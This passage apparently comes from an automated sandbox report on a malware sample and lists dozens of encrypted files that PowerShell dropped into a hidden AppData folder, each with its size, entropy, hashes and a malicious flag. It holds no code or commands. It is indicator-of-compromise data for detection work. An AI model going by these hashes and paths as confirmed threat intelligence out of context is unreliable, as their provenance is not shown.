                                                                                                    SSDEEP:1536:hnuNMvuULeq95xrsXpm27lB/8sRKR5frMbyhg3G8xYS2TnrOX7VwIqv2ksEt:huNM2Uiq95tsXpm27n/8xR5fb2WnXOaf
                                                                                                    MD5:C6CF3AC5862B1F0212DB08D19D240602
                                                                                                    SHA1:8BF329D08DB653C6D8CD8BD0B92EB6685FA6CED1
                                                                                                    SHA-256:5A789DA7F5A24B3812DAE8EF701DEAEEA9F66E341AA62BBC71B69041DACAFDFA
                                                                                                    SHA-512:E8FEA07BD3C865F9A6144DE015B2786943688EAC1C606AC671662AE7C0D99FF0A09CC6445E75A0CEB1EBDBF2E44A7C8929FDF663F15AFFF1830D9898808DFDCB
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MagEIVHxsBdRNjp.NwflVaJYmxekzGrXL
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111143
                                                                                                    Entropy (8bit):7.998002015170403
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:c2yY0e2ixhyedQlOpDkMBXMLexPI5o/FhCx:VN2ixhulOpDrXAOPooNE
                                                                                                    MD5:AEDD578082F46BB1CD21EF50D933C052
                                                                                                    SHA1:4AF5A285F75270A837DEAB46F1C3FDCE2627BD33
                                                                                                    SHA-256:27DB578F73287A1E509E92E7D608B3DF5EC3E89E363C3D54BB4611F9A2FA2F52
                                                                                                    SHA-512:94D71242E6E31131B54A68813FF4544412727067B114777F7A3489EB1C81E4543DD4E2F9D6FAE9D9B6210DA4CF6DA208664490ACB2C3237CD60E07480D6B1C7D
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MedJtTXhGrZjWzbSCwc.ueBoDFHWjxvkwtgQlJS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:MPEG-4 LOAS, 4 or more streams, 8 or more streams
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146417
                                                                                                    Entropy (8bit):7.998824977667268
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:EaXSBu16nmSV5EWKJYmuy1z1Xn9AbhTKMRluC9kqLdXEb:SBS6Z5EW1muMhWdTKMRluQRUb
                                                                                                    MD5:28A3A52BDE578B686C90CFD2B7B4D0B6
                                                                                                    SHA1:B0DB1D43C9CFBD34342E99312ADC33136E04A1F7
                                                                                                    SHA-256:D4DFE32F836D0C013CDD975786BE668887782C17AA20951A5D3CC11AE68BBED7
                                                                                                    SHA-512:F31FD300208F3D6D1C4720089DB02E0B1FB9B1265F43DBE06FCB5C3E907FC79D7A3C71DF10FB2FF25817ABC86B75A5145909C49DB0A3F64CB578ADB84E40BF90
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MjVTXQPhYeBZrGqmbyx.AEZcBgUzIlGaLhdNRMD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161228
                                                                                                    Entropy (8bit):7.9988301899998975
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:jSP0+RXbIlV0UgiDYE0FGg+6C8rI64KE+mhYYNTcxku0Ar/jZy0bI4c8eHbSR:23Xb6WFcYap64L+mhD9zITVykIw0U
                                                                                                    MD5:7A3B4183842C592239A18CFA7D26D462
                                                                                                    SHA1:CF7469F176475526A9E5F23972AA33386F1279D9
                                                                                                    SHA-256:21EB41B900295E008E50CB71FCEB57C46C87E11C911D43E37DBC96A622C7B5D4
                                                                                                    SHA-512:740D0E6FBAF64E5F91F0754A240E5E625579CD8B712A097C79C1EDE2B9552B8333D6CA3C1732678DEE3AFA9F9DBC6854CB7A7E2E0A94C7B06DDA3A0A166B94E6
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MsbYozWAJjl.JjkUaLCloqZWPyRrV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137186
                                                                                                    Entropy (8bit):7.998581256633021
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BojikVojaWqiSRIuBSyqo3MVFqMl16l+mY9vtwaobYGLz5Wr82N8w:OVojafRIuBio3cgMnv/8b535WrlR
                                                                                                    MD5:24DB63543894197B1409B3CC902087F1
                                                                                                    SHA1:22B4619E1C264EB8A656332822237DCD6694427E
                                                                                                    SHA-256:18B5EB43F6399B223648AEA1BE73B27EF2386F30972F072AA292CA71455B34FC
                                                                                                    SHA-512:96C34B28717C9C3723E559A2E3FDF409EB6101D7AA3618A1E0203CA49E5E2ED660A3BF982DB97299FE490E4D1681D1BE59B354B98690DDBCBA25F7CB59BB42BA
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MvdjTgbEaNoiscGDqtn.WONSgaonGDEziy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97419
                                                                                                    Entropy (8bit):7.99829208498736
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:aIcMYqf7sL6XFmJYzFdxNnWetWjEgbQBML7l67O2ZnoPx33RnwBcW2P/uE34lyVI:qMYGsaFmJ+DsTFg7DopHHuc/JLlW
                                                                                                    MD5:25186E8F24A2E349BE7F5722D8AD3C6D
                                                                                                    SHA1:A42A3114DD41C29174677CB4AC0C2ACEDCC62BE1
                                                                                                    SHA-256:FD413392F01F7BCE9C0749F6853EDD8FE1576AA0BE60B3C843946F18BACED19F
                                                                                                    SHA-512:5E9B4906139C69692B9136E8837AB1E9434BC6674E97B80728099DE11A53DED16ECAFA38B3307C03C6926E1C6CCC4A8922E72CA622D7460717FA297F8D458285
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MzQXnKpVhcwFJ.MjcskRTKCtFdzU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77266
                                                                                                    Entropy (8bit):7.997333995660756
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:1b1m27QcvkI0+Ju91JWN2SLbHnxlEPmaE+BYp3GiKopxBmVyjKSX4hXYdQ:vm27QcZ0QCJd4MmCA25AmVyGPhodQ
                                                                                                    MD5:B3B4ADFA0530BF6F3366803CED46F25B
                                                                                                    SHA1:68FA1CF38781BEA80E059D88E8DDF2791CCC679C
                                                                                                    SHA-256:E0283AF512F23ECAF9FC282040A423EDC812CF38AC29E08260764E8144728FDC
                                                                                                    SHA-512:28DBBE0E38139135E673B57824F49ECD83292312A1C723E26AC3B406B39230FD0C8D222501267E63D1DF012BE1BE9A0B3EDA6B192C614DEAEB953ADFA0796615
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NUuwnlhMdTb.LDJtiwjYkGKSH
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102084
                                                                                                    Entropy (8bit):7.998199508107113
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:853406xpk9SjETtEvY7+nGOdNoPP6nQ40i/UEOWm1eArMuyX+ooGEKh/ZSCgPGN/:ygp1/M+FAy0iMiiEoYh/ZSwN/9N/NLd
                                                                                                    MD5:34ECFBAB71737AF475F44A449AD740E1
                                                                                                    SHA1:EA05D8CA6147CE3D1B6CCB5BFA1454840BEE9501
                                                                                                    SHA-256:3862F24EEBE54F57E98FE5CCD368F246F7AC4EA31256A60A9D330C58C9B7D016
                                                                                                    SHA-512:8E4F19761D8AB0E0ACE9B79F2E67767E6455E68B18FE12E3CF3B5808A8DA781C56C300AE234A4826DEDD42EAFBE68B594FEEB76928DDF8E6ED121CF75891E8C2
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NmwdaSHLzrKcG.sUTeSQCDqMglv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93167
                                                                                                    Entropy (8bit):7.997908263465283
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:7PIfQ/5RqBsmmCAx7SjtBF7qOthcs058P5B+Ne++xshhz2RpkG/4zl6lt1:7zOBaqRqkis05mB0enihCpkG/O81
                                                                                                    MD5:99BF3DF334C89B3954DF26A6A4865251
                                                                                                    SHA1:E34B2A4D31EA7618C98E9C2F0478884BA2B75EF6
                                                                                                    SHA-256:009DF2BF74E01A19DF11A6EEBE82F11EE0BC6BDB0376986086FB5F3FB0008219
                                                                                                    SHA-512:DD9F5DC2D7897D50B3B02B0E4988875740EB881CDAB86754CC8FB60D31F05B2E6D81BC497E3EEAD23E3EC450C82390F04DEB44BBA708D9FC3804A5E0737FDBFE
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NnbGWhVIHviQJUCl.emqxByXsKfNQDIlcZAr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):110466
                                                                                                    Entropy (8bit):7.998235375845279
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:egIpVhAiGJCWPZfcPICcpo43F7KI2VsGKTlBp+cE:IYiGJnxf4xH43F7RzMcE
                                                                                                    MD5:97B3A7A2DACB4C5C22FD951688C9CEBA
                                                                                                    SHA1:58317A450EA1246578008CAF03CAEA291BB32223
                                                                                                    SHA-256:B298CFA8C4B102F467874376C771113BF3AD3A9DA45A626B1DE459B2A7BF7875
                                                                                                    SHA-512:F1106010F40A929BFC5A93F9D2CCFF28A70AD5091B1E2A930A6539DD0991ED6E3D36A90A1DAB1BF547F7AF79AB965BE519973E2BB727033411613DAFF5BA4138
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NqklLpvEIisy.iUnQhIslVWz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:MySQL table definition file Version 160, MySQL version 1757676594
                                                                                                    Category:dropped
                                                                                                    Size (bytes):136940
                                                                                                    Entropy (8bit):7.998795675164957
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:sS0wtjI4yAzas2/+Zz4E2GD9/0X9ZL1dPjqKH37QmctZeua:Rnt/u0z4E2GDW/RduirQ7Zna
                                                                                                    MD5:0BC6C7CA4AEDED7864FA9448874A6B48
                                                                                                    SHA1:4882EC4A610658FB01395CE09491196957A5E99B
                                                                                                    SHA-256:E969CEDAEF79369803436270907A7230017C2FB13355EE99356F6B693B21C7C8
                                                                                                    SHA-512:7535EDB90738C8A9E0904CE173351090AA6CD1D334560963DEBDC911D9EE4C56256C27866AC10F00222C49A8D698D2D97F887B5B1BA3EF3CBC7DD14231FEBCB8
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NsDTEAkUtyzhBJpa.YBGdolRunAaDWCNk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85890
                                                                                                    Entropy (8bit):7.997530190160418
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:rXv7pC50/YuAx7ZXR0hrmHuBKeIclqBU7ln6DdNkqGu5dx6fZP:b7pCC/YFVeKusehWOhP
                                                                                                    MD5:452262995CB1A72291952ECA7AA9EA4A
                                                                                                    SHA1:B1A876F89AE3C8C7AB13725D5FE793C54BC232A9
                                                                                                    SHA-256:7D3054F896920F6D3E9FAF4202AC40D26DB2E564BD245CE0C5B7FC8AC827C867
                                                                                                    SHA-512:0EFF9AE517892D6ADB03301B1557F44536EC0F0B1862969CD9EEEDEF4BF4E1063998D774D800D09C8584E037D38C6F711AE4D4B94C4B0CB64320F766D1222BC3
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NwpDsZzxlvWftkb.GPjxFwVuMq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51436
                                                                                                    Entropy (8bit):7.996836363197158
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:7Ua8JUmQLe1LAmG4BVH/ExbmBjWSeUu6RRvW/jwua+oJzXF0ts89p6opNAT6Jb:oaxLe1LA6PfEu/FSjfiatsMYopNATMb
                                                                                                    MD5:7F415090B824466902F716089978C8BD
                                                                                                    SHA1:A712A2AEAEB9DF264FE20FDF74EE6189732F3CBC
                                                                                                    SHA-256:77EF6288C2141CD03E78112464F2E43388685E164D0E2E228342442B4DCF1C32
                                                                                                    SHA-512:79907AF5865479EE45A162AA069D6549B84D86C774B07185A6AB6F985504E2C8261AAE876F19A57FAB8898597801A00B5F30DEE80943B5F333C168C5B82D644D
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NzJhdaGvYQIMCWXyVo.abCQEyeiskzcHNr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165928
                                                                                                    Entropy (8bit):7.998872646601057
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:qAoIDe24ajhzXuj7YYOsF6Cr7Na3o5Z5z8RxfTYodgd7SezaVOqk:qAoIC23hu/nFxrA3o5nmDtVOqk
                                                                                                    MD5:28BFD6478A851C2E855D2486B985EF7A
                                                                                                    SHA1:78DD5C3342BE1CC0D1456944359564B45454C7BC
                                                                                                    SHA-256:84923788E59DD25E3C11196A08B01538C75110F9B53CD4EE5EFA7BDB38066C4F
                                                                                                    SHA-512:F88A7EF997B5D7FBA02665CAFAB8498E8891C6E4C8FA35B833BE0202695B990141C714ACA17554A972AF4D3FC933FB8E3A4DB008423DE6E01E2AD87F0945FD19
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OJqQGEthlPbxWXVi.IREbMveLuPj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):129085
                                                                                                    Entropy (8bit):7.998683165330235
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:v14N52WMVTie3x4zFvEuthaProSCjAdgXE39oNjD4cPFesixO4:vqN3MBie3xuEuthO0S4AdKGKNjsZsif
                                                                                                    MD5:3E2FD69A59B4FC437A8F5CE80E51F104
                                                                                                    SHA1:BE5B1CF3F6E64A4729E40875FAE3CA3B571B8D3A
                                                                                                    SHA-256:828E09A9018F1ABC32FF41FDC20F172F31AAF2D1BCA857018CAD6F27704DC860
                                                                                                    SHA-512:8117DA1BF6DC2B6B48FA0895514276E8F983886C4CAF5C63BE04126C720D3968BC1757A1DAEC89000E2952F2642E6590E28C0BCECF47E7E8DA55374083448071
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OcynixVmLeJDf.JkwQlRstjfhIrmu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53847
                                                                                                    Entropy (8bit):7.996723534342086
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:s/qYHPle/u7KnzzqwJJ4sa5XoGHEQf0vD:spHPlhAJJ4sarFfW
                                                                                                    MD5:CCACF0D786A73122A8B9211625825F1B
                                                                                                    SHA1:4E9C759319DD2C517CFEE9C9790F4003B3EF6DE4
                                                                                                    SHA-256:A65AC9B06C8C8345A892A84F8578155B4DEC8A4274960478BFA9AD262D316277
                                                                                                    SHA-512:F1F1C08B9211DF57257720D7885E2F4527D753FF3F565E2BB0A5F349695072601E948070290FEED748E96783778E34CD69FBBFE83CC5D2CF6898D3649CCA08E3
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OfxkdNtvzrul.HfuIkQZjNpzDtBE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):91124
                                                                                                    Entropy (8bit):7.99792135658027
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:prYDRgg/JkCotDXGL2xX1RJhXdjrsiR1TfLz13AM76vfCqs2/xBjbHXhHmhpl:Lga1xX1JNBPfZ3Adv6wxBn3hGx
                                                                                                    MD5:62F9AEE86E52AAB962B139A0AA87C808
                                                                                                    SHA1:0057E2DBFAAFAB1006507B1056EF07C2759483AD
                                                                                                    SHA-256:B649858AF996FAD8E1E00FE39DC9A01B32BF777B5EF3C9656D976E7B9DC4F7F3
                                                                                                    SHA-512:A74B5AE50B814A42C8ABAE05B5E4FCACE74CCB8C6CBD24F709950759399081EE0AB9BA2C825B65D5505890DD33971F249C918A4C5B2D714F6E36C4F119877DA5
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OhzWVtYijvsgNyRIPo.SOmGaUYiWFcLyTk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54603
                                                                                                    Entropy (8bit):7.996813895772115
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:FnP0IyTZnlBpKNL8hX7ewoU83/MVN222xz2pWlL6nYLeToYKKisLYq6WQ2l2mC:10nQLOLewy/N22xmALR5YKALYpjRmC
                                                                                                    MD5:6009CAC5C31C4FA1C722056CC02C2C3F
                                                                                                    SHA1:4BEE0F0E6106F8B31CE76D0249DDF72AF600325B
                                                                                                    SHA-256:0DB76FE69595E66767F73F36755489A288B4985A2E2FC7A931D8ABFD5700D8E5
                                                                                                    SHA-512:AE5F03F70D74F53CD6D63ABB0C730D8BC49176DB3B484850F2B61CD5E63275ACA31E8DBC4BE032CAE5306C1452F52B527747554C53B4ECB0C7DC11A7320DF9FC
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OwLvGfFIgjatNhXYk.jDUyZcMJCXF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63548
                                                                                                    Entropy (8bit):7.997068000610037
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HSAGIteP+cNvT77mgvvHFLuOTAyG3J0wlG:yv4edvLlfFaOkJu
                                                                                                    MD5:CE50037F2D4DC994954C7A4A862D67DB
                                                                                                    SHA1:B4920C10C2C8B274FCCA81F67B2D63F4B9C7D707
                                                                                                    SHA-256:186794DB281BB51BB1E47E023CD90BD63EC346649448920AE683E9700B16563B
                                                                                                    SHA-512:BF261BCC21B3DDBDA44B9B16C625A6DA73D1832BBD6EF79E49DD24870F72AE18444238FFE444270B60FEDC50B5BA60D6C1EAF20D3E9B41A00257538FDBA99DAC
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PFeMhnqZuxdjwLs.FwsfCuyJHi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121679
                                                                                                    Entropy (8bit):7.9988958976011615
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xc4OFOViK9TEAKWOR+pZkwX1GohxkOb0Fijy5P0jx:xsKhEQ/ko1zhy9ijUqx
                                                                                                    MD5:CF7737C791581C26959329A9EF5A3601
                                                                                                    SHA1:19E57025295A4CE92F3485E35720C3408B138D5B
                                                                                                    SHA-256:9471E53447ECD49F216F1B2C8F7913B63B745B9604A734B16ABACF34C98B0A3F
                                                                                                    SHA-512:B17E49E8E45616CC9A160424480C1745AAABD6E659E98880494DB901DA1226B7551AA77F7321A2D14AE21E0E8C83EBB69A04FE14649080C94DC53FFCD8E7CA5B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PKtmvzhAfHwLQayDO.EHJOWhXcgMmyIQu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131570
                                                                                                    Entropy (8bit):7.9986455919199235
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:TwAzB1avSraJC3hTsRf1sMkpcNQBxD1iw:TLrraJC3hTsRf1Gpc+xP
                                                                                                    MD5:9582C735ADAB6E5DABB42150CBE097F6
                                                                                                    SHA1:C73AF442CD05EF30A8AEE6203A1150FB70928CDA
                                                                                                    SHA-256:E6E7666BEE317E23ECC789BD519DC037A62732058517EA900943F1D54766BF09
                                                                                                    SHA-512:E79C25EAAD673073233782E8FF32B355419493CEABB2FD332743286E4A9C08F79849AF015747666992050CEFB62628A2C744F018B307F409BD02059F4616F8FC
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PbIDenfGQKx.zElKnPYTdymqjU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):119981
                                                                                                    Entropy (8bit):7.998414444471701
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:YKjk0VTkNXgsDI4Fjk0WEa0s8+2Q6X392:YUjxMX1DI4Fo0Zat8+UA
                                                                                                    MD5:3487260482DC7DE637A50AA45B2B9328
                                                                                                    SHA1:9A6E75A3B921441348274C844D49534CD14AC41C
                                                                                                    SHA-256:012F3266A8C1D7F71106922D4C1F6AB9123CFEEAFD42B68E92E6ED51CB4A2D54
                                                                                                    SHA-512:76DCFE0645EDB90AFE40FE6EF3FF18F1C4C4338B10E2C1379A533AA56CBA74AF0B687AABCBD1C4CE9AE390FA3B94DF16D80D2FFBE813B08400D9D906BA611EAF
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhBMnijfgvzeWFCyu.LXQnKvNVIeqRft
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170378
                                                                                                    Entropy (8bit):7.999038393061325
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0zmCogHxHL6mkSbAPiJaKOdOrxNoyt0xg/PwauU66MKaHQVvBF6fOTAhQW:TgRrHtMP6SW7fw2X3aHqno
                                                                                                    MD5:6E0C90A4E7A6B13E77AA2C2E932DF6FC
                                                                                                    SHA1:6994C4F50BBF7869F62EB7772F6C9CD0CA2BC0B9
                                                                                                    SHA-256:B6F94B97EFFD00250B3A181787603948E8A9FF32E0D3E20124BCAB8C96444F44
                                                                                                    SHA-512:FB8F0AD78A7A1965E1B0D5484FD13EBFCBD8005B6C0B45BBECE77FDDA1EF06073E342D77E9350C40A923A64D7428275AF3D5D717363706DB900AA6DF9CDED4BC
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhpTdsaYUALNiFDIwG.JpUwWdCOQqnhTMXxgbi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75771
                                                                                                    Entropy (8bit):7.997457503802259
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Xa+s08Zd5rSlUVi60X3Fy6m5ancj9Lyn7Ri8Ztwdtbeb:Xz8ZdFS8Uy3Py1iawzeb
                                                                                                    MD5:2B900AE2052AEDA995DBC10CBC42AB2D
                                                                                                    SHA1:890BFAAD2CC0CFAF49AEF6EF1F3253B3B2DF0928
                                                                                                    SHA-256:5F0CADD56598BEF91EA7B7E9EBE6E51D05BB9259EDFD04BD023F2A8F05768794
                                                                                                    SHA-512:68F70519435E958C7E1217658A43242EEB786D5B64666E17AE252F244D860BE9EB4C5C5BCB315951EA3F0D846698F53A3E098BB11EE9BD37CACD3A72581198A3
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PzQxGhZMRuseFjit.ryMaLfYUwEIBs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124206
                                                                                                    Entropy (8bit):7.998488758127075
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QbsAxtYzPFaEySJf.kQirKnpDRZz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):167160
                                                                                                    Entropy (8bit):7.998758242798626
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QhXpkEIjKSCGAfNrnoD.ZwRhpmrkqFAfTo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146198
                                                                                                    Entropy (8bit):7.998744732694824
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QhgrcMJXSHzINnGbdDT.NVnmCWbAGhrQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):84052
                                                                                                    Entropy (8bit):7.997767758280846
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QkNpehbFPBTqcWHD.NeoCKXbxqvtHSyVgM
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):122007
                                                                                                    Entropy (8bit):7.99829792551388
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RAswJiTFDGOWcQ.UQAOiPrXmWVhMIs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93062
                                                                                                    Entropy (8bit):7.9979537709098505
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RBArIVNnXHyhJFkCQs.zVcHABCaPI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93834
                                                                                                    Entropy (8bit):7.998225979165039
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RIDwqQlOShWbB.DbIqQNkpiX
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):115221
                                                                                                    Entropy (8bit):7.998604662084565
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RQNTbKkeZihpqDAa.QgnobFEcuPBMRlATavD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187285
                                                                                                    Entropy (8bit):7.999053967908
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RaQCLKpVhzYw.NSoHEYRjGuW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99613
                                                                                                    Entropy (8bit):7.998150617202663
                                                                                                    Encrypted:true
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwXrMTAiyahtEd.XyCGmHiwnWlMOA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):168782
                                                                                                    Entropy (8bit):7.999156996539708
